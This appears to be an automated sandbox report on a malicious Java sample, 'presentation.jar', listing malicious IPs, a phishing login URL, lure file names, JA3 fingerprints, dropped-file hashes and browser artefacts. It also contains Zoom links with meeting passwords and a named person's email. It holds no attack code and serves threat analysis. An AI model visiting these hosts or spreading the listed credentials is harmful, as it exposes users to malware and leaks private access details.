35.181.18.61	http://technoraga.com/Doc.htm	Get hash	malicious	Browse	transurban.sc.omtrdc.net/b/ss/transurban-website-prd/10/JS-2.20.0-LAUN/s67471978777989?AQB=1&pccr=true&vidn=2FD976FD0515F365-60000B8424D9D8C2&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=16%2F10%2F2020%2022%3A24%3A10%201%20480&d.&nsid=0&jsonv=1&.d&ce=UTF-8&ns=transurban&cdp=2&g=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&c.&evt_customPageView=1&new_repeat=New&t_hour=4%3A24%20PM&t_day=Tuesday&p_pi_url=D%3Dg&get_load_time=53&p_pi_pageID=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&p_pi_pageName=Login%20-%20Office365&p_pi_pageURL=http%3A%2F%2Ftechnoraga.com%2FDoc.htm&p_pi_brand=LINKT&p_pi_sysEnv=Desktop&p_pi_delayType=Normal&p_cat_primaryCategory=Login%20-%20Office365%20-%20Manage%20LINKT&version=1.0&vendor_GoogleAnalytics_account=UA-9250181-37&excCodes=1&.c&cc=AUD&server=technoraga.com&s=1280x1024&c=24&j=1.6&v=Y&k=N&bw=784&bh=554&AQE=1
50.87.249.219	presentation.jar	Get hash	malicious	Browse
50.87.249.219	presentation.jar	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
consent-pref.trustarc.com	presentation.jar	Get hash	malicious	Browse	13.32.21.15
	presentation.jar	Get hash	malicious	Browse	13.32.21.47
	presentation.jar	Get hash	malicious	Browse	143.204.98.13
	presentation.jar	Get hash	malicious	Browse	143.204.98.25
	presentation.jar	Get hash	malicious	Browse	52.84.148.45
	presentation.jar	Get hash	malicious	Browse	13.225.93.123
	http://www.openair.com	Get hash	malicious	Browse	13.224.93.99
	https://online.pubhtml5.com/yjuu/ehxc/	Get hash	malicious	Browse	13.224.102.38
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=ccaddb8300774be5bf5454596900c46a&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.64
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=6874089d077d486d97b209b7a897287e&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.116
	http://santacruzcounty.us/	Get hash	malicious	Browse	13.224.95.109
	https://zoom.us/j/896762422?pwd=N3UvN2pHZURNWXhQYVdIZDN0T0JUQT09	Get hash	malicious	Browse	143.204.89.129
	OPEN.odt	Get hash	malicious	Browse	143.204.89.115
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.123
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.109
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	143.204.94.26
	http://www.realnikerunningshoes.com/nike-free-run-women-women-nike-free-40-v2-c-63_71.html	Get hash	malicious	Browse	13.227.223.124
	https://baylor.zoom.us/j/268358425?pwd=MW1jK0hQbU1jbXBhdEhPV05BZ3NDZz09&data=01\|01\|toby_barnett@baylor.edu\|12dc7fbb38a24468ed4f08d80882e94c\|22d2fb35256a459bbcf4dc23d42dc0a4\|0&sdata=mVw4ogjLNmcHPDOSI9ENKhErFYmq8RdmucjXGYYto2E=&reserved=0	Get hash	malicious	Browse	13.224.95.108
	DART%20-%20Session%20information%20and%20consent%20form_DCE%20bfbs.docx	Get hash	malicious	Browse	13.226.173.113
	https://us04web.zoom.us/j/78253099567?pwd=Ri9HSEFHWFFQTmdBWVlieDlSaGtYZz09	Get hash	malicious	Browse	143.204.97.112
consent-st.trustarc.com	presentation.jar	Get hash	malicious	Browse	65.9.66.35
	presentation.jar	Get hash	malicious	Browse	65.9.66.110
	presentation.jar	Get hash	malicious	Browse	143.204.98.16
	presentation.jar	Get hash	malicious	Browse	143.204.98.126
	presentation.jar	Get hash	malicious	Browse	13.226.247.46
	presentation.jar	Get hash	malicious	Browse	143.204.202.115
	http://www.openair.com	Get hash	malicious	Browse	13.224.93.39
	https://online.pubhtml5.com/yjuu/ehxc/	Get hash	malicious	Browse	13.224.102.42
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=ccaddb8300774be5bf5454596900c46a&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.22
	https://go.servicenow.com/LP=9828?elqcampid=28164&cname=EM-eDM-ITAM-SAM-Nurture-20JUL20-AMS&elqTrackId=6874089d077d486d97b209b7a897287e&elq=2f40df029a4b4ce0957181eee902ee38&elqaid=37809&elqat=1&elqCampaignId=28164	Get hash	malicious	Browse	143.204.94.22
	http://santacruzcounty.us/	Get hash	malicious	Browse	13.224.95.23
	https://zoom.us/j/896762422?pwd=N3UvN2pHZURNWXhQYVdIZDN0T0JUQT09	Get hash	malicious	Browse	143.204.89.123
	OPEN.odt	Get hash	malicious	Browse	143.204.89.108
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.123
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	13.224.95.23
	FBGBU Simphony Customer Signoff - Sept 2018 v3.4.docm	Get hash	malicious	Browse	143.204.94.40
	http://www.realnikerunningshoes.com/nike-free-run-women-women-nike-free-40-v2-c-63_71.html	Get hash	malicious	Browse	13.227.223.29
	https://baylor.zoom.us/j/268358425?pwd=MW1jK0hQbU1jbXBhdEhPV05BZ3NDZz09&data=01\|01\|toby_barnett@baylor.edu\|12dc7fbb38a24468ed4f08d80882e94c\|22d2fb35256a459bbcf4dc23d42dc0a4\|0&sdata=mVw4ogjLNmcHPDOSI9ENKhErFYmq8RdmucjXGYYto2E=&reserved=0	Get hash	malicious	Browse	13.224.95.117
	DART%20-%20Session%20information%20and%20consent%20form_DCE%20bfbs.docx	Get hash	malicious	Browse	13.35.43.30
	https://us04web.zoom.us/j/78253099567?pwd=Ri9HSEFHWFFQTmdBWVlieDlSaGtYZz09	Get hash	malicious	Browse	143.204.97.127

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	vegas.dll	Get hash	malicious	Browse	3.134.106.170
	BOA_20219398900.doc	Get hash	malicious	Browse	52.74.11.221
	LM Approved Invoices 06052021.doc	Get hash	malicious	Browse	52.74.11.221
	63C2AB0ECE24B47CDCFE2128789214F87451A3D82D641.exe	Get hash	malicious	Browse	3.136.65.236
	60b88477_by_Libranalysis.exe	Get hash	malicious	Browse	52.58.78.16
	ACH Payment.html	Get hash	malicious	Browse	15.237.76.117
	8c2d96ab_by_Libranalysis.exe	Get hash	malicious	Browse	52.15.160.167
	e9777bb4_by_Libranalysis.exe	Get hash	malicious	Browse	52.58.78.16
	file.msg.exe	Get hash	malicious	Browse	44.237.4.96
	DHL Receipt_AWB811470484778.exe	Get hash	malicious	Browse	52.15.160.167
	NEW ORDER.exe	Get hash	malicious	Browse	52.15.160.167
	BE1ACE4FB42EC06E5D5337EA5FCA98F46044BE06D3BA3.exe	Get hash	malicious	Browse	3.22.30.40
	D3AAB88BB737961C971ED047B4C2D5B640EFF8E678781.exe	Get hash	malicious	Browse	3.22.15.135
	sa.exe	Get hash	malicious	Browse	3.13.31.214
	rest.exe	Get hash	malicious	Browse	34.215.31.225
	fymCAunsmv.exe	Get hash	malicious	Browse	13.58.157.220
	ACH PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	52.34.69.24
	ACH PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	65.9.66.79
	Quotation_05052021.Pdf.exe	Get hash	malicious	Browse	52.15.160.167
	3HAJwQRLSy.exe	Get hash	malicious	Browse	3.142.167.4
AMAZON-02US	vegas.dll	Get hash	malicious	Browse	3.134.106.170
	BOA_20219398900.doc	Get hash	malicious	Browse	52.74.11.221
	LM Approved Invoices 06052021.doc	Get hash	malicious	Browse	52.74.11.221
	63C2AB0ECE24B47CDCFE2128789214F87451A3D82D641.exe	Get hash	malicious	Browse	3.136.65.236
	60b88477_by_Libranalysis.exe	Get hash	malicious	Browse	52.58.78.16
	ACH Payment.html	Get hash	malicious	Browse	15.237.76.117
	8c2d96ab_by_Libranalysis.exe	Get hash	malicious	Browse	52.15.160.167
	e9777bb4_by_Libranalysis.exe	Get hash	malicious	Browse	52.58.78.16
	file.msg.exe	Get hash	malicious	Browse	44.237.4.96
	DHL Receipt_AWB811470484778.exe	Get hash	malicious	Browse	52.15.160.167
	NEW ORDER.exe	Get hash	malicious	Browse	52.15.160.167
	BE1ACE4FB42EC06E5D5337EA5FCA98F46044BE06D3BA3.exe	Get hash	malicious	Browse	3.22.30.40
	D3AAB88BB737961C971ED047B4C2D5B640EFF8E678781.exe	Get hash	malicious	Browse	3.22.15.135
	sa.exe	Get hash	malicious	Browse	3.13.31.214
	rest.exe	Get hash	malicious	Browse	34.215.31.225
	fymCAunsmv.exe	Get hash	malicious	Browse	13.58.157.220
	ACH PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	52.34.69.24
	ACH PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	65.9.66.79
	Quotation_05052021.Pdf.exe	Get hash	malicious	Browse	52.15.160.167
	3HAJwQRLSy.exe	Get hash	malicious	Browse	3.142.167.4
AMAZON-AESUS	60b88477_by_Libranalysis.exe	Get hash	malicious	Browse	34.202.122.77
	mazx_3.exe	Get hash	malicious	Browse	23.21.48.44
	ACH Payment.html	Get hash	malicious	Browse	100.26.130.143
	REVISED ORDER.exe	Get hash	malicious	Browse	54.85.86.211
	e9777bb4_by_Libranalysis.exe	Get hash	malicious	Browse	54.237.120.40
	file.msg.exe	Get hash	malicious	Browse	54.174.78.117
	3029ed0d_by_Libranalysis.exe	Get hash	malicious	Browse	54.235.83.248
	fecd086e_by_Libranalysis.rtf	Get hash	malicious	Browse	54.83.52.76
	sa.exe	Get hash	malicious	Browse	3.81.223.53
	NcLDA3J4Kp.apk	Get hash	malicious	Browse	54.152.99.44
	Update-KB1484-x86.exe	Get hash	malicious	Browse	54.174.78.117
	Qau4wCF5R7.exe	Get hash	malicious	Browse	54.243.154.178
	A4F95464ECCEF0C4DA2D48481EF8B1006A6ED0918FB42.exe	Get hash	malicious	Browse	54.226.29.2
	SecuriteInfo.com.Heur.10838.xls	Get hash	malicious	Browse	23.21.27.29
	j4X6nUwn8O.exe	Get hash	malicious	Browse	50.17.5.224
	run_9294a.exe	Get hash	malicious	Browse	54.226.29.2
	run_9294a.exe	Get hash	malicious	Browse	54.226.29.2
	Sample Order.exe	Get hash	malicious	Browse	54.225.165.85
	Payment.xlsx	Get hash	malicious	Browse	54.156.162.121
	presentation.jar	Get hash	malicious	Browse	34.202.206.65

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	BR-721595.htm	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	FAXF5VCY1V8XM.htm	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	scan 0094775885895555.html	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	4LIsYL2H6J.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	1v65bsIDAE.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	settle invoices.pdf.exe	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	Hanglung859.html	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	qpdzgvcyy.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	ACH PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	MuZ2I=GZ.htm	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	Introduction Quotation Request pdf.exe	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	April outstanding remittance.htm	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	f241f1c4_by_Libranalysis.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	OneDrive Received anonymized.html	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	evZLIWscXJ.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	evZLIWscXJ.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	qFhBOs5IMr.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	RW5h3IpKZl.dll	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	cchambers@fultonbank.com_ProjectDocument.HTML	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
	Payment Report (Tue, 04 May 2021).hTMl	Get hash	malicious	Browse	143.204.209.41 143.204.209.31 34.202.206.65 35.181.18.61 143.204.209.88
d2935c58fe676744fecc8614ee5356c7	Bank payment copy.jar	Get hash	malicious	Browse	50.87.249.219
	Bank payment copy.jar	Get hash	malicious	Browse	50.87.249.219
	PL-REM-40310EMEA02 (0085).jar	Get hash	malicious	Browse	50.87.249.219
	PL-REM-40310EMEA02 (0085).jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice-BCS_ECS9522020909153934_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	DHL Notification.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice-BCS_ECS9522020909153934_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	Payment Advice-BCS_ECS9522020909153934_3159_952.jar	Get hash	malicious	Browse	50.87.249.219
	DHL Notification.jar	Get hash	malicious	Browse	50.87.249.219
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	50.87.249.219
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	50.87.249.219
	Annexure A-61322.jar	Get hash	malicious	Browse	50.87.249.219
	EPC Works for AMAALA AIRFIELD PROJECT - WORK .jar	Get hash	malicious	Browse	50.87.249.219
	Voicemail.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219
	presentation.jar	Get hash	malicious	Browse	50.87.249.219

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\broker.dll	presentation.jar	Get hash	malicious	Browse
C:\Users\user\AppData\Local\broker.dll	presentation.jar	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.817551365376543
Encrypted:	false
SSDEEP:	3:oFj4I5vpN6yUbLNin:oJ5X6yM4
MD5:	77319DC1BE60485CFC878679D31018C3
SHA1:	C996970C778C6214A32082F832C679C92FCA3BCC
SHA-256:	06464D47AD09224F278ACD074B6C3776BA35488A412FBE59F1D9F5D82F6F1996
SHA-512:	74CDE5535735A53D3C709BFEF19930AE6DE7B4B5CA612A8E682FEB7302C680587227AAFAD6E27273AC06EF9471C794B049134380C37D5E6C0B7F6D12B882C6E2
Malicious:	false
Reputation:	low
Preview:	C:\Program Files (x86)\Java\jre1.8.0_211..1620349083180..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\1WHIQG87\consent-pref.trustarc[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\HZXWTR4U\www.java[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3077
Entropy (8bit):	5.5760794477457045
Encrypted:	false
SSDEEP:	96:8m9elhm9eQ7Whm9ezhm9eB39Xhm9eB39jhm9eB39Ihm9eB39Bhm9eBn69mhm9eBQ:ze0eANe+eDqeDueDzeDIeadeaUq
MD5:	B2E7C28C0C389ED18D25059FCDDFD3A2
SHA1:	7ADA89F447B844A5E0275988977C47E598274BE1
SHA-256:	1584D7E4E42BA84B866EC2F77703A2FAA080BC793E945B2F711A596263EB08D6
SHA-512:	6D01ACC2AC189D6B63C9C2F1C26A0BB376CB5BDE4DB85E5E9AAD4A551FB187C96780EAC925CAFE40A30A207E03ECB76ACDB00D37439D752F22E9D3E371CED79F
Malicious:	false
Reputation:	low
Preview:	<root></root><root></root><root></root><root></root><root></root><root></root><root></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/"}" ltime="210092688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/","test_cookie48632":"test_cookie48632=cookie;domain=.com;path=/;expires=Sat, 08 May 2021 00:58:10 GMT"}" ltime="210212688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/"}" ltime="210252688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{"ORA_FPC":"ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\KZCX22WH\consent.trustarc[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4774F23E-AECF-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	38488
Entropy (8bit):	1.9001724104575213
Encrypted:	false
SSDEEP:	192:r7ZYZo2sQNWsjtsTfsltsrHWsTsefskMrsXDfsT7rsig:rN4/+kSuPShESSG
MD5:	34F83BC0D7AE7D4D9FBA8814E1214EE5
SHA1:	5E5403D4DFCCC034684CC8547BECB844488E18AF
SHA-256:	5D088CF0DD11AFF62CBC9FA4CFF26EC25954C54F17CB1033266A2EF27C3AC610
SHA-512:	6D7A29E5969C0560511796031717D654EAB6AAD7D0459EA69507BE348A3892FFE8B954368BCAFD31EF18D978327041D285DC86DD82EC7BB38F601076D845495A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4774F240-AECF-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	123316
Entropy (8bit):	3.582003734177119
Encrypted:	false
SSDEEP:	384:rPHFGf6acjd6gxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1ZqZG0Z7ZPL:1mU9A2Fz9nnLqWKwrsYrfO
MD5:	96D4325DAE2A0E8A54935BE4B42425CB
SHA1:	CA52DD8926523694658C052DF3464395C7182524
SHA-256:	9942E8AC4C32670E1B8D43AE2955ACDA341BE7916D12879AAE0E0CDCCC49007E
SHA-512:	DB1E4DDAB6E0A4281BFFBD8392F29D51267D0C08B1C763D093CF1F9BC778CABA40C6194607AA9197C35B7BED93618375CB97281F4C4C28612D02423BC0B2FE18
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4774F241-AECF-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5843453942242887
Encrypted:	false
SSDEEP:	48:Iw0GcprFGwpa8G4pQfGrapbSfGQpKVG7HpRDTGIpX2jGApm:roZPQc6jBSJAETpF6g
MD5:	536A03BDE1C855EAD5F98C4D32F1A5E4
SHA1:	FA7D0D9161425674E12A96A48FA585AE60F6F9DC
SHA-256:	827AC8248091B050FDBF55DA0DC93C102388A75CC1E7F7930D3097175C3D660E
SHA-512:	F343F3A5E192A0005FD37F03071191E0B89D378E7BC446A6E8200FF5C6EC0E91116744178DC5850101EE6D39FCEDF1BC010FB4C8890414557A729E7CDA9DB1F6
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.108239286922099
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEo+/+J4nWimI002EtM3MHdNMNxOEo+/+J4nWimI00ObVbkEtMb:2d6NxOP4SZHKd6NxOP4SZ76b
MD5:	07713F8795A7AC8D40E29BB774A0D60F
SHA1:	8DE093E466A6581B78CF088EB536BCFE98C8A00C
SHA-256:	A15F31ABA1CF2C1203189CE38F4002918799075BCBB38B1A970F1F1039F1E18A
SHA-512:	3396EC531E9EBB021E86BE9667D6C7786FDF3D6FCB9D7218A939654E83DFF3F330A575DE43FDF995DC64EEDBAA396C6A8D9CBA5D19CD95C1EF86FA5B7D3BD80C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.1108173845531475
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2ke4nWimI002EtM3MHdNMNxe2ke4nWimI00Obkak6EtMb:2d6Nxrt4SZHKd6Nxrt4SZ7Aa7b
MD5:	B9AD8C1B0799CA40C85D5280F22D1E1B
SHA1:	FA3F50BA5146A4BEEAE8BC0AF5FE029B24730223
SHA-256:	5201DEFD931706EC10E5C409F891BCF42BC08E6339728F74ECE4B001B56DB6F8
SHA-512:	2167643F96CFD0D45DFD1B953EF15652EC025DB1199EF9FA7B66468D3C2949CADE996507AA17A81014C9B6A1BA19306CA533BBC43D00C18507DE01832C27185B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1d598c0a,0x01d742dc</date><accdate>0x1d598c0a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1d598c0a,0x01d742dc</date><accdate>0x1d598c0a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.1257647004823506
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLo+/+J4nWimI002EtM3MHdNMNxvLo+/+J4nWimI00ObmZEtMb:2d6Nxv44SZHKd6Nxv44SZ7mb
MD5:	6F65D739DA46501A6EC1493AAC393DE0
SHA1:	A6846ABCA9709295ABACEACDDD19A02CC9E2F062
SHA-256:	A6A46931E159F9301B7AA5689DBECB299726CCE0D1F5982745A916F619100930
SHA-512:	BDB14B3D12E12A89A0824E2F2C75770831A4A3B0B575F858DB8C88A612859BD5AE07BFC944F27CFBE5266E2521FA097B6DE35D281B2B458D78937C8B4EA6566A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.077125650463378
Encrypted:	false
SSDEEP:	12:TMHdNMNxiZEIEJ4nWimI002EtM3MHdNMNxiZEIEJ4nWimI00Obd5EtMb:2d6Nxud64SZHKd6Nxud64SZ7Jjb
MD5:	54121404D1FD1B3FD5AFCED31AB3B825
SHA1:	D41C4E4E87CBA4B612EA70A706CDC2AE26281C8F
SHA-256:	6830F81D4E257DC42D6BB0170D277DE6C296C8C1A0326F81637A2FE557C6B84D
SHA-512:	4BD6E7D671D625E2B7EA40638138130EB0435678FEB98AF96997D5A60E9AB249EFD08D72EB160CA907D1D4DFD646F9CB6DF93CFA12B7EAE63990BAD393E61670
Malicious:	false
